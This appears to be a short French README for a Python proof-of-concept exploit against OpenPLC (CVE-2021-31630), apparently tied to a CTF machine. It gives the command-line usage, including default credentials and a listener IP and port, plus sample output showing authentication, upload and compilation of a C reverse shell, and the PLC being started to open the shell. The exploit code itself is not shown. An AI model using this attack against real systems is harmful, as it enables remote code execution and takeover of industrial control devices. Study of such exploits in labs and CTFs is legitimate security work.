
Exploit POC pour CVE-2021-31630 écrit en Python3 et utilisant un reverse shell C en mode non bloquant
Cet exploit est basé sur l'exploit de Exploit-DB créé par Fellipe Oliveira.
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>
Options :
--url - URL de l'OpenPLC--username - nom d'utilisateur--password - mot de passe--listenerip - adresse IP de l'écouteur--listenerport - port de l'écouteurNOTE: Cet exploit est créé comme une preuve de concept ; utilisez-le uniquement à des fins éducatives ou en CTF - https://flojboj.org/article/WifineticTwo